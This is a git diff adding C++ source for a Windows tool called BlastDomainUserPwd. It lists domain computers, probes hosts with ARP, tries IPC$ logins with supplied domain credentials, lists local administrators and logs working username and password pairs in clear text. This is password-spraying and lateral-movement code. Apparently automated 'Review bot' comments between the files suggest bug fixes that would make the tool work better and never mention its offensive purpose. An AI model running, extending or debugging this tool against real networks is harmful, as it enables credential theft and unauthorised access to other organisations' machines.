diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..e645270
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,353 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+##
+## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
+
+# User-specific files
+*.rsuser
+*.suo
+*.user
+*.userosscache
+*.sln.docstates
+
+# User-specific files (MonoDevelop/Xamarin Studio)
+*.userprefs
+
+# Mono auto generated files
+mono_crash.*
+
+# Build results
+[Dd]ebug/
+[Dd]ebugPublic/
+[Rr]elease/
+[Rr]eleases/
+x64/
+x86/
+[Aa][Rr][Mm]/
+[Aa][Rr][Mm]64/
+bld/
+[Bb]in/
+[Oo]bj/
+[Ll]og/
+[Ll]ogs/
+
+# Visual Studio 2015/2017 cache/options directory
+.vs/
+# Uncomment if you have tasks that create the project's static files in wwwroot
+#wwwroot/
+
+# Visual Studio 2017 auto generated files
+Generated\ Files/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+# NUnit
+*.VisualState.xml
+TestResult.xml
+nunit-*.xml
+
+# Build Results of an ATL Project
+[Dd]ebugPS/
+[Rr]eleasePS/
+dlldata.c
+
+# Benchmark Results
+BenchmarkDotNet.Artifacts/
+
+# .NET Core
+project.lock.json
+project.fragment.lock.json
+artifacts/
+
+# StyleCop
+StyleCopReport.xml
+
+# Files built by Visual Studio
+*_i.c
+*_p.c
+*_h.h
+*.ilk
+*.meta
+*.obj
+*.iobj
+*.pch
+*.pdb
+*.ipdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*_wpftmp.csproj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Chutzpah Test files
+_Chutzpah*
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opendb
+*.opensdf
+*.sdf
+*.cachefile
+*.VC.db
+*.VC.VC.opendb
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+*.sap
+
+# Visual Studio Trace Files
+*.e2e
+
+# TFS 2012 Local Workspace
+$tf/
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+*.DotSettings.user
+
+# JustCode is a .NET coding add-in
+.JustCode
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# AxoCover is a Code Coverage Tool
+.axoCover/*
+!.axoCover/settings.json
+
+# Visual Studio code coverage results
+*.coverage
+*.coveragexml
+
+# NCrunch
+_NCrunch_*
+.*crunch*.local.xml
+nCrunchTemp_*
+
+# MightyMoose
+*.mm.*
+AutoTest.Net/
+
+# Web workbench (sass)
+.sass-cache/
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.[Pp]ublish.xml
+*.azurePubxml
+# Note: Comment the next line if you want to checkin your web deploy settings,
+# but database connection strings (with potential passwords) will be unencrypted
+*.pubxml
+*.publishproj
+
+# Microsoft Azure Web App publish settings. Comment the next line if you want to
+# checkin your Azure Web App publish settings, but sensitive information contained
+# in these scripts will be unencrypted
+PublishScripts/
+
+# NuGet Packages
+*.nupkg
+# NuGet Symbol Packages
+*.snupkg
+# The packages folder can be ignored because of Package Restore
+**/[Pp]ackages/*
+# except build/, which is used as an MSBuild target.
+!**/[Pp]ackages/build/
+# Uncomment if necessary however generally it will be regenerated when needed
+#!**/[Pp]ackages/repositories.config
+# NuGet v3's project.json files produces more ignorable files
+*.nuget.props
+*.nuget.targets
+
+# Microsoft Azure Build Output
+csx/
+*.build.csdef
+
+# Microsoft Azure Emulator
+ecf/
+rcf/
+
+# Windows Store app package directories and files
+AppPackages/
+BundleArtifacts/
+Package.StoreAssociation.xml
+_pkginfo.txt
+*.appx
+*.appxbundle
+*.appxupload
+
+# Visual Studio cache files
+# files ending in .cache can be ignored
+*.[Cc]ache
+# but keep track of directories ending in .cache
+!?*.[Cc]ache/
+
+# Others
+ClientBin/
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.jfm
+*.pfx
+*.publishsettings
+orleans.codegen.cs
+
+# Including strong name files can present a security risk
+# (https://github.com/github/gitignore/pull/2483#issue-259490424)
+#*.snk
+
+# Since there are multiple workflows, uncomment next line to ignore bower_components
+# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
+#bower_components/
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+ServiceFabricBackup/
+*.rptproj.bak
+
+# SQL Server files
+*.mdf
+*.ldf
+*.ndf
+
+# Business Intelligence projects
+*.rdl.data
+*.bim.layout
+*.bim_*.settings
+*.rptproj.rsuser
+*- [Bb]ackup.rdl
+*- [Bb]ackup ([0-9]).rdl
+*- [Bb]ackup ([0-9][0-9]).rdl
+
+# Microsoft Fakes
+FakesAssemblies/
+
+# GhostDoc plugin setting file
+*.GhostDoc.xml
+
+# Node.js Tools for Visual Studio
+.ntvs_analysis.dat
+node_modules/
+
+# Visual Studio 6 build log
+*.plg
+
+# Visual Studio 6 workspace options file
+*.opt
+
+# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
+*.vbw
+
+# Visual Studio LightSwitch build output
+**/*.HTMLClient/GeneratedArtifacts
+**/*.DesktopClient/GeneratedArtifacts
+**/*.DesktopClient/ModelManifest.xml
+**/*.Server/GeneratedArtifacts
+**/*.Server/ModelManifest.xml
+_Pvt_Extensions
+
+# Paket dependency manager
+.paket/paket.exe
+paket-files/
+
+# FAKE - F# Make
+.fake/
+
+# CodeRush personal settings
+.cr/personal
+
+# Python Tools for Visual Studio (PTVS)
+__pycache__/
+*.pyc
+
+# Cake - Uncomment if you are using it
+# tools/**
+# !tools/packages.config
+
+# Tabs Studio
+*.tss
+
+# Telerik's JustMock configuration file
+*.jmconfig
+
+# BizTalk build output
+*.btp.cs
+*.btm.cs
+*.odx.cs
+*.xsd.cs
+
+# OpenCover UI analysis results
+OpenCover/
+
+# Azure Stream Analytics local run output
+ASALocalRun/
+
+# MSBuild Binary and Structured Log
+*.binlog
+
+# NVidia Nsight GPU debugger configuration file
+*.nvuser
+
+# MFractors (Xamarin productivity tool) working folder
+.mfractor/
+
+# Local History for Visual Studio
+.localhistory/
+
+# BeatPulse healthcheck temp database
+healthchecksdb
+
+# Backup folder for Package Reference Convert tool in Visual Studio 2017
+MigrationBackup/
+
+# Ionide (cross platform F# VS Code tools) working folder
+.ionide/
diff --git a/BlastDomainUserPwd/.gitignore b/BlastDomainUserPwd/.gitignore
new file mode 100644
index 0000000..e645270
--- /dev/null
+++ b/BlastDomainUserPwd/.gitignore
@@ -0,0 +1,353 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+##
+## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
+
+# User-specific files
+*.rsuser
+*.suo
+*.user
+*.userosscache
+*.sln.docstates
+
+# User-specific files (MonoDevelop/Xamarin Studio)
+*.userprefs
+
+# Mono auto generated files
+mono_crash.*
+
+# Build results
+[Dd]ebug/
+[Dd]ebugPublic/
+[Rr]elease/
+[Rr]eleases/
+x64/
+x86/
+[Aa][Rr][Mm]/
+[Aa][Rr][Mm]64/
+bld/
+[Bb]in/
+[Oo]bj/
+[Ll]og/
+[Ll]ogs/
+
+# Visual Studio 2015/2017 cache/options directory
+.vs/
+# Uncomment if you have tasks that create the project's static files in wwwroot
+#wwwroot/
+
+# Visual Studio 2017 auto generated files
+Generated\ Files/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+# NUnit
+*.VisualState.xml
+TestResult.xml
+nunit-*.xml
+
+# Build Results of an ATL Project
+[Dd]ebugPS/
+[Rr]eleasePS/
+dlldata.c
+
+# Benchmark Results
+BenchmarkDotNet.Artifacts/
+
+# .NET Core
+project.lock.json
+project.fragment.lock.json
+artifacts/
+
+# StyleCop
+StyleCopReport.xml
+
+# Files built by Visual Studio
+*_i.c
+*_p.c
+*_h.h
+*.ilk
+*.meta
+*.obj
+*.iobj
+*.pch
+*.pdb
+*.ipdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*_wpftmp.csproj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Chutzpah Test files
+_Chutzpah*
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opendb
+*.opensdf
+*.sdf
+*.cachefile
+*.VC.db
+*.VC.VC.opendb
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+*.sap
+
+# Visual Studio Trace Files
+*.e2e
+
+# TFS 2012 Local Workspace
+$tf/
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+*.DotSettings.user
+
+# JustCode is a .NET coding add-in
+.JustCode
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# AxoCover is a Code Coverage Tool
+.axoCover/*
+!.axoCover/settings.json
+
+# Visual Studio code coverage results
+*.coverage
+*.coveragexml
+
+# NCrunch
+_NCrunch_*
+.*crunch*.local.xml
+nCrunchTemp_*
+
+# MightyMoose
+*.mm.*
+AutoTest.Net/
+
+# Web workbench (sass)
+.sass-cache/
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.[Pp]ublish.xml
+*.azurePubxml
+# Note: Comment the next line if you want to checkin your web deploy settings,
+# but database connection strings (with potential passwords) will be unencrypted
+*.pubxml
+*.publishproj
+
+# Microsoft Azure Web App publish settings. Comment the next line if you want to
+# checkin your Azure Web App publish settings, but sensitive information contained
+# in these scripts will be unencrypted
+PublishScripts/
+
+# NuGet Packages
+*.nupkg
+# NuGet Symbol Packages
+*.snupkg
+# The packages folder can be ignored because of Package Restore
+**/[Pp]ackages/*
+# except build/, which is used as an MSBuild target.
+!**/[Pp]ackages/build/
+# Uncomment if necessary however generally it will be regenerated when needed
+#!**/[Pp]ackages/repositories.config
+# NuGet v3's project.json files produces more ignorable files
+*.nuget.props
+*.nuget.targets
+
+# Microsoft Azure Build Output
+csx/
+*.build.csdef
+
+# Microsoft Azure Emulator
+ecf/
+rcf/
+
+# Windows Store app package directories and files
+AppPackages/
+BundleArtifacts/
+Package.StoreAssociation.xml
+_pkginfo.txt
+*.appx
+*.appxbundle
+*.appxupload
+
+# Visual Studio cache files
+# files ending in .cache can be ignored
+*.[Cc]ache
+# but keep track of directories ending in .cache
+!?*.[Cc]ache/
+
+# Others
+ClientBin/
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.jfm
+*.pfx
+*.publishsettings
+orleans.codegen.cs
+
+# Including strong name files can present a security risk
+# (https://github.com/github/gitignore/pull/2483#issue-259490424)
+#*.snk
+
+# Since there are multiple workflows, uncomment next line to ignore bower_components
+# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
+#bower_components/
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+ServiceFabricBackup/
+*.rptproj.bak
+
+# SQL Server files
+*.mdf
+*.ldf
+*.ndf
+
+# Business Intelligence projects
+*.rdl.data
+*.bim.layout
+*.bim_*.settings
+*.rptproj.rsuser
+*- [Bb]ackup.rdl
+*- [Bb]ackup ([0-9]).rdl
+*- [Bb]ackup ([0-9][0-9]).rdl
+
+# Microsoft Fakes
+FakesAssemblies/
+
+# GhostDoc plugin setting file
+*.GhostDoc.xml
+
+# Node.js Tools for Visual Studio
+.ntvs_analysis.dat
+node_modules/
+
+# Visual Studio 6 build log
+*.plg
+
+# Visual Studio 6 workspace options file
+*.opt
+
+# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
+*.vbw
+
+# Visual Studio LightSwitch build output
+**/*.HTMLClient/GeneratedArtifacts
+**/*.DesktopClient/GeneratedArtifacts
+**/*.DesktopClient/ModelManifest.xml
+**/*.Server/GeneratedArtifacts
+**/*.Server/ModelManifest.xml
+_Pvt_Extensions
+
+# Paket dependency manager
+.paket/paket.exe
+paket-files/
+
+# FAKE - F# Make
+.fake/
+
+# CodeRush personal settings
+.cr/personal
+
+# Python Tools for Visual Studio (PTVS)
+__pycache__/
+*.pyc
+
+# Cake - Uncomment if you are using it
+# tools/**
+# !tools/packages.config
+
+# Tabs Studio
+*.tss
+
+# Telerik's JustMock configuration file
+*.jmconfig
+
+# BizTalk build output
+*.btp.cs
+*.btm.cs
+*.odx.cs
+*.xsd.cs
+
+# OpenCover UI analysis results
+OpenCover/
+
+# Azure Stream Analytics local run output
+ASALocalRun/
+
+# MSBuild Binary and Structured Log
+*.binlog
+
+# NVidia Nsight GPU debugger configuration file
+*.nvuser
+
+# MFractors (Xamarin productivity tool) working folder
+.mfractor/
+
+# Local History for Visual Studio
+.localhistory/
+
+# BeatPulse healthcheck temp database
+healthchecksdb
+
+# Backup folder for Package Reference Convert tool in Visual Studio 2017
+MigrationBackup/
+
+# Ionide (cross platform F# VS Code tools) working folder
+.ionide/
diff --git a/BlastDomainUserPwd/BlastDomainUserPwd.vcxproj b/BlastDomainUserPwd/BlastDomainUserPwd.vcxproj
new file mode 100644
index 0000000..4be1091
--- /dev/null
+++ b/BlastDomainUserPwd/BlastDomainUserPwd.vcxproj
@@ -0,0 +1,154 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ {8E6C051D-CCE2-4A1F-9E1C-458683468F7B}
+ BlastDomainUserPwd
+ 10.0
+
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v110_xp
+ true
+ Unicode
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ false
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/BlastDomainUserPwd/BlastDomainUserPwd.vcxproj.filters b/BlastDomainUserPwd/BlastDomainUserPwd.vcxproj.filters
new file mode 100644
index 0000000..e4f6474
--- /dev/null
+++ b/BlastDomainUserPwd/BlastDomainUserPwd.vcxproj.filters
@@ -0,0 +1,39 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ 源文件
+
+
+ 源文件
+
+
+ 源文件
+
+
+
+
+ 头文件
+
+
+ 头文件
+
+
+ 头文件
+
+
+
\ No newline at end of file
diff --git a/BlastDomainUserPwd/CommonApi.cpp b/BlastDomainUserPwd/CommonApi.cpp
new file mode 100644
index 0000000..0aaf301
--- /dev/null
+++ b/BlastDomainUserPwd/CommonApi.cpp
@@ -0,0 +1,116 @@
+#include "CommonApi.h"
+
+
+// UnicodeתΪANSI
+char* CommonApi::UnicodeToAnsi(const wchar_t* szStr)
+{
+ int nLen = WideCharToMultiByte(CP_ACP, 0, szStr, -1, NULL, 0, NULL, NULL);
+ if (nLen == 0)
+ {
+ return NULL;
+ }
+ char* pResult = new char[nLen];
+ WideCharToMultiByte(CP_ACP, 0, szStr, -1, pResult, nLen, NULL, NULL);
+ return pResult;
+}
+
+// ANSIתΪUnicode
+wchar_t* CommonApi::AnsiToUnicode(const char* str)
+{
+ int textlen;
+ wchar_t* result;
+ textlen = MultiByteToWideChar(CP_ACP, 0, str, -1, NULL, 0);
+ result = (wchar_t*)malloc((textlen + 1) * sizeof(wchar_t));
+ memset(result, 0, (textlen + 1) * sizeof(wchar_t));
+ MultiByteToWideChar(CP_ACP, 0, str, -1, (LPWSTR)result, textlen);
+ return result;
+}
+
+
+
+// ַָ
+std::vector CommonApi::splitString(std::wstring strSrc, std::wstring pattern)
+{
+ std::vector resultstr;
+
+ // ַԽȡһ
+ std::wstring strcom = strSrc.append(pattern);
+ // wprintf(L"%s\n", strcom);
+ auto pos = strSrc.find(pattern);
+ auto len = strcom.size();
+
+ //
+ while (pos != std::wstring::npos)
+ {
+ std::wstring coStr = strcom.substr(0, pos);
+ // wprintf(L"%s ", coStr.c_str());
+ resultstr.push_back(coStr);
+
+ strcom = strcom.substr(pos + pattern.size(), len);
+ pos = strcom.find(pattern);
+ }
+
+ return resultstr;
+}
+
+// ļ
+HANDLE CommonApi::CreateFileApi(LPCWSTR fileName)
+{
+ HANDLE hFile; //
+ hFile = CreateFile(fileName, // name of the write
+ GENERIC_WRITE, // open for writing
+ FILE_SHARE_READ, // do not share
+ NULL, // default security
+ OPEN_ALWAYS, // create new file only
+ FILE_ATTRIBUTE_NORMAL, // normal file
+ NULL); // no attr. template
+ return hFile;
+}
+
+// ļд
+VOID CommonApi::WriteFileApi(HANDLE hFile, LPWSTR content)
+{
+ LPSTR lpContent = UnicodeToAnsi(content); // дļ
+ DWORD dwBytesToWrite = (DWORD)strlen(lpContent); // ݳ
+ DWORD dwBytesWritten = 0;
+ BOOL bErrorFlag = FALSE;
+
+ bErrorFlag = WriteFile(
+ hFile, // open file handle
+ lpContent, // start of data to write
+ dwBytesToWrite, // number of bytes to write
+ &dwBytesWritten, // number of bytes that were written
+ NULL); // no overlapped structure
+
+ if (FALSE == bErrorFlag)
+ {
+ printf("Terminal failure: Unable to write to file.\n");
+ }
+ else
+ {
+ if (dwBytesWritten != dwBytesToWrite)
+ {
+ // This is an error because a synchronous write that results in
+ // success (WriteFile returns TRUE) should write all data as
+ // requested. This would not necessarily be the case for
+ // asynchronous writes.
+ printf("Error: dwBytesWritten != dwBytesToWrite\n");
+ }
+ /*
+ else
+ {
+ wprintf(TEXT("Wrote %d bytes to successfully.\n"), dwBytesWritten);
+ }
+ */
+ }
+}
+
+// ɹIPCĽ
+void CommonApi::saveIPCok(HANDLE SuccessFile, LPWSTR lpUncComputerName, LPWSTR lpTotalAdministratorName, LPWSTR password)
+{
+ PWCHAR wstr = new WCHAR[MAX_PATH];
+ wprintf(L"[OK] net use %s /u:%s %s\n", lpUncComputerName, lpTotalAdministratorName, password);
+ StringCchPrintfW(wstr, MAX_PATH, L"net use %s /u:%s %s\n", lpUncComputerName, lpTotalAdministratorName, password);
+ WriteFileApi(SuccessFile, wstr);
+ delete wstr;
+}
\ No newline at end of file
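Review bot: `delete wstr;` at the end of saveIPCok releases a buffer obtained with `new WCHAR[MAX_PATH]`, which is undefined behavior; it should be `delete[] wstr;`. WriteFileApi never frees the `lpContent` buffer that UnicodeToAnsi allocates with `new char[]`, so every call leaks it — add `delete[] lpContent;` once the WriteFile result has been handled. AnsiToUnicode passes the `malloc` result to memset and MultiByteToWideChar without a null check, and neither converter checks the result of the second conversion call. CreateFileApi's `// create new file only` comment contradicts the OPEN_ALWAYS flag beside it, and because OPEN_ALWAYS leaves the file pointer at offset 0 with no FILE_APPEND_DATA or SetFilePointer, a second run overwrites the existing file rather than appending to it. Note also that saveIPCok writes the password in clear text to success.txt, so that file has to be treated as sensitive output.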
diff --git a/BlastDomainUserPwd/CommonApi.h b/BlastDomainUserPwd/CommonApi.h
new file mode 100644
index 0000000..a3063e0
--- /dev/null
+++ b/BlastDomainUserPwd/CommonApi.h
@@ -0,0 +1,24 @@
+#include "tou.h"
+#pragma once
+class CommonApi
+{
+public:
+ // UnicodeתΪANSI
+ char* UnicodeToAnsi(const wchar_t* szStr);
+
+ // ANSIתΪUnicode
+ wchar_t* AnsiToUnicode(const char* str);
+
+ // ַָ
+ std::vector splitString(std::wstring strSrc, std::wstring pattern);
+
+ // ļ
+ HANDLE CreateFileApi(LPCWSTR fileName);
+
+ // ļд
+ VOID WriteFileApi(HANDLE hFile, LPWSTR content);
+
+ // ɹIPCĽ
+ void saveIPCok(HANDLE SuccessFile, LPWSTR lpUncComputerName, LPWSTR lpTotalAdministratorName, LPWSTR password);
+
+};
\ No newline at end of file
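Review bot: The header does not document buffer ownership for UnicodeToAnsi and AnsiToUnicode, even though the implementation allocates one result with `new char[]` and the other with `malloc`, so a caller cannot tell whether to use `delete[]` or `free`. Add a comment on each declaration such as `// Returns a heap buffer the caller must release with delete[]; NULL on conversion failure.` and `// Returns a heap buffer the caller must release with free().`, or better, switch both to the same allocator. `#include "tou.h"` appears before `#pragma once`; the pragma should be the first line of the header, and WNetApi.h has the same ordering.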
diff --git a/BlastDomainUserPwd/WNetApi.cpp b/BlastDomainUserPwd/WNetApi.cpp
new file mode 100644
index 0000000..5daf7f3
--- /dev/null
+++ b/BlastDomainUserPwd/WNetApi.cpp
@@ -0,0 +1,174 @@
+#include "WNetApi.h"
+
+// ipc
+int WNetApi::WNetAddConnection2Api(LPWSTR lpRemoteName, LPWSTR lpDomainUserName, LPWSTR lpPassword)
+{
+ // wprintf(L"net use %s /u:%s %s\n", lpRemoteName, lpDomainUserName, lpPassword);
+ DWORD dwRetVal;
+ NETRESOURCE nr;
+ DWORD dwFlags;
+
+ memset(&nr, 0, sizeof(NETRESOURCE)); // սṹڴ
+
+
+ // ṹֵ
+ nr.dwType = RESOURCETYPE_ANY;
+ nr.lpLocalName = NULL; // F: ӳ䵽صĴ̣磺Z̵. ַΪգlpLocalNameΪNULLúԴӣض豸
+ nr.lpRemoteName = lpRemoteName; // \\192.168.232.128\temp ĿŹĴ
+ nr.lpProvider = NULL;
+
+
+ dwFlags = CONNECT_UPDATE_PROFILE;
+ dwRetVal = WNetAddConnection2(&nr, lpPassword, lpDomainUserName, dwFlags);
+
+ // жǷɹ
+ if (dwRetVal == NO_ERROR)
+ {
+ // wprintf(L"[+] %s Connection success\n", nr.lpRemoteName);
+ return 1;
+ }
+ else if (dwRetVal == 67) // δҵ
+ {
+ // wprintf(L"[-] %s The network name could not be found.\n", nr.lpRemoteName);
+ return 0;
+ }
+ else if (dwRetVal == 1326) // ˺
+ {
+ // wprintf(L"[-] %s The user name or password is incorrect.\n", nr.lpRemoteName);
+ return 0;
+ }
+ else //
+ {
+ // wprintf(L"[-] %s WNetAddConnection2 failed with error: %u\n", nr.lpRemoteName, dwRetVal);
+ return 0;
+ }
+
+}
+
+// ɾipc
+int WNetApi::WNetCancelConnection2Api(LPWSTR lpRemoteName)
+{
+ DWORD dwRetVal;
+ dwRetVal = WNetCancelConnection2(lpRemoteName, 0, TRUE);
+
+ if (dwRetVal == NO_ERROR)
+ {
+ // wprintf(L"Connection cancel to %s\n", lpRemoteName);
+ return 1;
+ }
+ else
+ {
+ // wprintf(L"WNetCancelConnection2 failed with error: %u\n", dwRetVal);
+ return 0;
+ }
+}
+
+// ȡб
+std::vector WNetApi::NetGroupGetUsersApi(LPWSTR servername, LPWSTR groupname)
+{
+ wprintf(L"------------------------------------Get a list of domain computers------------------------------------\n");
+
+ DWORD dwLevel = 1;
+ GROUP_USERS_INFO_1* bufptr;
+ DWORD dwPrefmaxlen = MAX_PREFERRED_LENGTH;
+ DWORD dwEntriesread;
+ DWORD dwTotalentries;
+ DWORD dwRetVul;
+ std::vector hostnameList; // vector
+
+ dwRetVul = NetGroupGetUsers(servername, groupname, dwLevel, (LPBYTE*)&bufptr, dwPrefmaxlen, &dwEntriesread, &dwTotalentries, NULL);
+ wprintf(L"num: %d\n", dwEntriesread);
+
+ if (dwRetVul == NO_ERROR)
+ {
+ for (DWORD i = 0; i < dwEntriesread; i++)
+ {
+ // wprintf(L"[%u] %s ", i, bufptr[i].grui1_name);
+ std::wstring hostname(bufptr[i].grui1_name);
+ hostname.replace(hostname.end() - 1, hostname.end(), 1, NULL); // ĩβ$滻Ϊ
+ hostnameList.push_back(hostname.data()); //
+ wprintf(L"%s\n", hostname.data());
+ }
+
+
+
+ return hostnameList;
+ }
+ else
+ {
+ wprintf(L"error : %u\nhttps://docs.microsoft.com/en-us/windows/win32/netmgmt/network-management-error-codes", dwRetVul);
+ exit(0);
+ }
+
+
+}
+
+// гع
+std::vector WNetApi::NetLocalGroupGetMembersApi(LPWSTR aliveIp)
+{
+ std::vector ipAdministratorsGroup;
+
+ LPCWSTR servername = aliveIp; // ѾipcӵIP
+ LPCWSTR TargetGroup = L"administrators"; //
+ LOCALGROUP_MEMBERS_INFO_2* buff; // LOCALGROUP_MEMBERS_INFO_2ṹbuffŻȡϢ
+ DWORD dwPrefmaxlen = MAX_PREFERRED_LENGTH; // ָݵѡȣֽΪλָMAX_PREFERRED_LENGTHúڴ
+ DWORD dwEntriesread; // ָһֵָ룬ֵʵöٵԪ
+ DWORD dwTotalentries;
+ NetLocalGroupGetMembers(servername, TargetGroup, 2, (LPBYTE*)&buff, dwPrefmaxlen, &dwEntriesread, &dwTotalentries, NULL);
+ // wprintf(L"dwEntriesread: %d\ndwTotalentries: %d\n", dwEntriesread, dwTotalentries);
+ for (DWORD i = 0; i < dwEntriesread; i++) {
+ // wprintf(L"%s\n", buff[i].lgrmi2_domainandname);
+ ipAdministratorsGroup.push_back(buff[i].lgrmi2_domainandname);
+ // wprintf(L"SID:%d\n", buff[i].lgrmi2_sid); // sidǺҪ
+ // wprintf(L"SIDUSAGE:%d\n",buff[i].lgrmi2_sidusage);
+ }
+ return ipAdministratorsGroup;
+}
+
+
+// ̽
+BOOL WNetApi::detectAlive(int i, LPWSTR ip)
+{
+
+ DWORD dwRetVal;
+ ULONG dstMac[2] = { 0 };
+ memset(dstMac, 0xff, sizeof(dstMac));
+ ULONG MacAddr[2]; /* for 6-byte hardware addresses */
+ ULONG PhysAddrLen = 6; /* default to length of six bytes */
+
+ dwRetVal = SendARP(inet_addr(theCommonApi.UnicodeToAnsi(ip)), 0, &MacAddr, &PhysAddrLen); // arp̽ inet_addr()ǽһƵIPַ(192.168.0.1)תΪin_addrṹ
+
+ if (dwRetVal == NO_ERROR)
+ {
+ wprintf(L"[#%d] %s is alive.\n", i, ip);
+ return TRUE;
+ }
+ else {
+ wprintf(L"[#%d] %s is die. ", i, ip);
+ // printf("[#%d] Error: %s SendArp failed with error: %d", i, ip, dwRetVal);
+ switch (dwRetVal) {
+ case ERROR_GEN_FAILURE:
+ printf(" (ERROR_GEN_FAILURE)\n");
+ break;
+ case ERROR_INVALID_PARAMETER:
+ printf(" (ERROR_INVALID_PARAMETER)\n");
+ break;
+ case ERROR_INVALID_USER_BUFFER:
+ printf(" (ERROR_INVALID_USER_BUFFER)\n");
+ break;
+ case ERROR_BAD_NET_NAME:
+ printf(" (ERROR_GEN_FAILURE)\n");
+ break;
+ case ERROR_BUFFER_OVERFLOW:
+ printf(" (ERROR_BUFFER_OVERFLOW)\n");
+ break;
+ case ERROR_NOT_FOUND:
+ printf(" (ERROR_NOT_FOUND)\n");
+ break;
+ default:
+ printf("\n");
+ break;
+ }
+ return FALSE;
+ }
+}
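Review bot: NetLocalGroupGetMembersApi discards the return value of NetLocalGroupGetMembers and then loops over `dwEntriesread`, which is never initialized, so on any failure the loop reads an indeterminate count and dereferences an unset `buff`; initialize both (`DWORD dwEntriesread = 0, dwTotalentries = 0;`, `LOCALGROUP_MEMBERS_INFO_2* buff = NULL;`) and only iterate when the call returns NERR_Success. Neither this function nor NetGroupGetUsersApi calls `NetApiBufferFree` on the buffer the API allocates, so each call leaks it. In NetGroupGetUsersApi, `wprintf(L"num: %d\n", dwEntriesread)` uses `%d` for a DWORD (`%lu` matches), `hostname.replace(..., 1, NULL)` stores an embedded NUL instead of removing the trailing character (`if (!hostname.empty() && hostname.back() == L'$') hostname.pop_back();` is the intent), and the error path calls `exit(0)`, which reports success to the parent process. In detectAlive the `ERROR_BAD_NET_NAME` case prints `(ERROR_GEN_FAILURE)` — a copy-paste slip — and the `UnicodeToAnsi` result handed to inet_addr is never released.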
